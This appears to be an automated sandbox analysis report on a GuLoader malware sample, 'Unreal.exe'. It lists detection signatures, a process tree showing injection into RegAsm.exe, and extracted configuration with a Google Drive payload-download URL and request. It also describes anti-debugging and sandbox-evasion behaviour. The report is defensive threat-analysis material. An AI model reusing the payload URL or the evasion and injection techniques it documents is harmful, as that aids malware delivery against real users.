
Windows Analysis Report Unreal.exe

Overview

General Information

Sample Name: Unreal.exe
Analysis ID: 1369
MD5: 35a93d1f2edc044b3d8289abfeb17a43
SHA1: c29f2524ae4bd239c849720b1fc6ce5c13bee93b
SHA256: 88d3b3a6564e25b63b31f4a00361384fd294f228763b3bde4e3162144971d385

Detection

GuLoader
Score: 92
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
GuLoader behavior detected
Yara detected GuLoader
Hides threads from debuggers
Writes to foreign memory regions
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
One or more processes crash
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains functionality for execution timing, often used to detect debuggers
Abnormal high CPU Usage
Creates a DirectInput object (often for capturing keystrokes)
Drops files with a non-matching file extension (content does not match file extension)
PE file does not import any functions
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Checks if the current process is being debugged
Enables security privileges
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)

Process Tree

  • System is w10x64native
  • Unreal.exe (PID: 9076 cmdline: 'C:\Users\user\Desktop\Unreal.exe' MD5: 35A93D1F2EDC044B3D8289ABFEB17A43)
    • RegAsm.exe (PID: 6940 cmdline: 'C:\Users\user\Desktop\Unreal.exe' MD5: A64DACA3CFBCD039DF3EC29D3EDDD001)
    • RegAsm.exe (PID: 7508 cmdline: 'C:\Users\user\Desktop\Unreal.exe' MD5: A64DACA3CFBCD039DF3EC29D3EDDD001)
      • conhost.exe (PID: 7772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • WerFault.exe (PID: 3384 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7508 -s 828 MD5: 40A149513D721F096DDF50C04DA2F01F)
  • mpam-20b5c938.exe (PID: 6140 cmdline: 'C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-20b5c938.exe' /q WD MD5: 4CF0EA82FA547953BAA24CEB4AFDE935)
    • MpSigStub.exe (PID: 9104 cmdline: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exe /stub 1.1.18500.10 /payload 1.349.1496.0 /program C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-20b5c938.exe /q WD MD5: 01F92DC7A766FF783AE7AF40FD0334FB)
  • wevtutil.exe (PID: 5464 cmdline: C:\Windows\system32\wevtutil.exe uninstall-manifest C:\Windows\TEMP\A491FE0B-CBB3-0812-A9E9-28E6069853FA.man MD5: C57C1292650B6384903FE6408D412CFA)
    • conhost.exe (PID: 8100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • wevtutil.exe (PID: 6516 cmdline: C:\Windows\system32\wevtutil.exe install-manifest C:\Windows\TEMP\A491FE0B-CBB3-0812-A9E9-28E6069853FA.man '/resourceFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll' '/messageFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll' '/parameterFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll' MD5: C57C1292650B6384903FE6408D412CFA)
    • conhost.exe (PID: 3060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "https://drive.google.com/uc?export=dow"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000008.00000002.5646431545.0000000000D50000.00000040.00000001.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |
00000008.00000000.5536067468.0000000000D50000.00000040.00000001.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |
00000008.00000000.5526072916.0000000000D50000.00000040.00000001.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: Unreal.exe | Malware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=dow"}
Multi AV Scanner detection for submitted file
Source: Unreal.exe | ReversingLabs: Detection: 13%
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exe | Code function: 24_2_00007FF742E2C1C4 CreateDirectoryW,FreeLibrary,DecryptFileW,FreeLibrary,FreeLibrary,
Source: Unreal.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: unknown | HTTPS traffic detected: 142.250.185.142:443 -> 192.168.11.20:49763 version: TLS 1.2
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exe | Code function: 24_2_00007FF742E2B030 FindNextFileW,FindClose,FindFirstFileW,
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exe | Code function: 24_2_00007FF742E2ADEC FindFirstFileW,FindNextFileW,FindClose,FindClose,
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exe | Code function: 24_2_00007FF742E52504 FindFirstFileExW,FindNextFileW,FindClose,FindClose,
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exe | Code function: 24_2_00007FF742DDF810 FindFirstFileW,FindNextFileW,FindClose,CloseHandle,CloseHandle,

Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: https://drive.google.com/uc?export=dow
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic | HTTP traffic detected:
    GET /uc?export=download&id=1JZajQIQdUbLIFKGrWeKAj7F2g5cgApuC HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
    Host: drive.google.com
    Cache-Control: no-cache
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown | Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Content-Type: text/html; charset=UTF-8
    x-chromium-appcache-fallback-override: disallow-fallback
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    Content-Security-Policy: script-src 'nonce-MIVbPGF4ZuXsZ2NZTTzVEQ' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/
    Date: Mon, 27 Sep 2021 14:33:04 GMT
    Expires: Mon, 27 Sep 2021 14:33:04 GMT
    Cache-Control: private, max-age=0
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    X-XSS-Protection: 1; mode=block
    Server: GSE
    Set-Cookie: NID=511=kWh_xUioAXmCXt6QIW6Mm4DtzPI9_fAr2WiFKEmXPAjZvuWqXj1I7phnbwK5qVZOA3KA2Dwc9IGtRHUtfxRy-aBcUQZ4zKf-uCz414_kuMrvIGUe_DgGauW80ouL5dhtM9v6jgmzo75QoUqo2k6HSanF5BaWh7W1UvFmn1Szn94; expires=Tue, 29-Mar-2022 14:33:04 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
    Accept-Ranges: none
    Vary: Accept-Encoding
    Connection: close
    Transfer-Encoding: chunked
Source: RegAsm.exe, 00000008.00000000.5527652097.0000000001197000.00000004.00000020.sdmp, WerFault.exe, 0000000C.00000002.5644218565.0000000005978000.00000004.00000001.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: RegAsm.exe, 00000008.00000000.5527652097.0000000001197000.00000004.00000020.sdmp, WerFault.exe, 0000000C.00000002.5644218565.0000000005978000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: RegAsm.exe, 00000008.00000003.3163191728.0000000001197000.00000004.00000001.sdmp | String found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/
Source: RegAsm.exe, 00000008.00000000.5537128570.0000000001173000.00000004.00000020.sdmp | String found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/Qe
Source: RegAsm.exe, 00000008.00000002.5647356413.0000000001108000.00000004.00000020.sdmp | String found in binary or memory: https://drive.google.com/A
Source: RegAsm.exe, 00000008.00000002.5647356413.0000000001108000.00000004.00000020.sdmp | String found in binary or memory: https://drive.google.com/I
Source: RegAsm.exe, 00000008.00000000.5526462839.0000000000FE0000.00000004.00000001.sdmp, RegAsm.exe, 00000008.00000000.5536952737.0000000001151000.00000004.00000020.sdmp | String found in binary or memory: https://drive.google.com/uc?export=download&id=1JZajQIQdUbLIFKGrWeKAj7F2g5cgApuC
Source: RegAsm.exe, 00000008.00000002.5647356413.0000000001108000.00000004.00000020.sdmp | String found in binary or memory: https://drive.google.com/uc?export=download&id=1JZajQIQdUbLIFKGrWeKAj7F2g5cgApuCY
Source: unknown | DNS traffic detected: queries for: drive.google.com
        Source: WerFault.exe, 0000000C.00000003.5552485796.000000000518D000.00000004.00000001.sdmpBinary or memory string: DWM8And16Bit_DirectDrawCreateEx_CallOut
        Source: Unreal.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7508 -s 828
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-20b5c938.exeFile deleted: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeJump to behavior
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-20b5c938.exeFile created: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CDJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 8_2_00D5FA0B
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 8_2_00D5A31F
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 8_2_00D5000A
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 8_2_00D57996
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 8_2_00D50AC4
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 8_2_00D57281
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 8_2_00D5E2B0
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 8_2_00D59AA7
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 8_2_00D595CB
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 8_2_00D5E567
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 8_2_00D59515
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 8_2_00D59E3B
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742DD3728
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742DC86BC
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742DCFF90
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742DDD038
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742E2E410
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742E4837C
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742DF0320
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742E52504
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742E534D4
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742DF6480
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742E42480
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742DC1420
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742DEB20C
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742E0A288
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742DE9278
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742E3C21C
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742E477FC
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742E2F76C
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742E0490C
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742E3B88C
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742DEA818
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742DF15F8
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742E37600
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742E39520
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742DEC52C
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742DF1C10
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742E39B34
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742DE1D00
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742DC9CFC
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742DF3CE0
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742E3CCC8
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742DE3C87
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742E3BC60
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742E3D9D0
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742DCB944
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742E41950
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742DF0AB0
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742E3BA74
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742DEAA68
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742DDEFCC
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742DDDFB4
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742E45F9C
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742DD1FA8
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742DEFFA8
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742E37108
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742DCB0C8
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742E3D058
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742E4B058
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742E27050
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742E3C034
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742DF502C
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742E41E00
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742E22DD4
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742E3DD9C
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742E21D78
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742E25ED0
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742E3BE48
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: String function: 00007FF742DD0DB4 appears 56 times
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: String function: 00007FF742DD0D88 appears 41 times
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: String function: 00007FF742E2BAAC appears 36 times
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 8_2_00D5F3D0 NtProtectVirtualMemory,
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 8_2_00D5A31F NtAllocateVirtualMemory,LoadLibraryA,
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 8_2_00D59E3B NtAllocateVirtualMemory,
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742DDC444 NtQueryInformationProcess,NtQueryInformationProcess,FindCloseChangeNotification,CloseHandle,
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742DE5B80 ReadFile,FlushFileBuffers,SetEndOfFile,NtSetInformationFile,
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742DD9FF0 NtSetInformationFile,
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742DE5DB4 NtQueryInformationFile,NtQueryInformationFile,RtlNtStatusToDosError,
        Source: C:\Users\user\Desktop\Unreal.exeProcess Stats: CPU usage > 98%
        Source: mpasdlta.vdm.23.drStatic PE information: No import functions for PE file found
        Source: mpavdlta.vdm.23.drStatic PE information: No import functions for PE file found
        Source: Unreal.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: C:\Users\user\Desktop\Unreal.exeSection loaded: edgegdi.dll
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeSection loaded: sfc.dll
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeSection loaded: edgegdi.dll
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeSection loaded: edgegdi.dll
        Source: C:\Windows\System32\wevtutil.exeProcess token adjusted: Security
        Source: Unreal.exeReversingLabs: Detection: 13%
        Source: Unreal.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\Unreal.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: C:\Users\user\Desktop\Unreal.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
        Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
        Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
        Source: unknownProcess created: C:\Users\user\Desktop\Unreal.exe 'C:\Users\user\Desktop\Unreal.exe'
        Source: C:\Users\user\Desktop\Unreal.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 'C:\Users\user\Desktop\Unreal.exe'
        Source: C:\Users\user\Desktop\Unreal.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 'C:\Users\user\Desktop\Unreal.exe'
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7508 -s 828
        Source: unknownProcess created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-20b5c938.exe 'C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-20b5c938.exe' /q WD
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-20b5c938.exeProcess created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exe C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exe /stub 1.1.18500.10 /payload 1.349.1496.0 /program C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-20b5c938.exe /q WD
        Source: unknownProcess created: C:\Windows\System32\wevtutil.exe C:\Windows\system32\wevtutil.exe uninstall-manifest C:\Windows\TEMP\A491FE0B-CBB3-0812-A9E9-28E6069853FA.man
        Source: C:\Windows\System32\wevtutil.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknownProcess created: C:\Windows\System32\wevtutil.exe C:\Windows\system32\wevtutil.exe install-manifest C:\Windows\TEMP\A491FE0B-CBB3-0812-A9E9-28E6069853FA.man '/resourceFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll' '/messageFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll' '/parameterFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll'
